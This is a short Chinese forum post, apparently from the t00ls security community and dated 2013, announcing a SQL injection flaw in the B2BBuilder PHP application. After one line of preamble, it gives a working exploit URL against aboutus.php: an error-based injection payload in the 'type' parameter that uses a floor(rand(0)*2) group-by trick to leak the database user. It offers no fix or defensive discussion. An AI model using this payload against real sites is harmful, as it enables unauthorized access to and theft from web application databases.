[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 3739
最近工作好忙,这不有时间了,看看php代码,不能生锈呢.


直接上利用方式,大家一看就懂.
http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z
类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc
17

评论17次

要评论?请先  登录  或  注册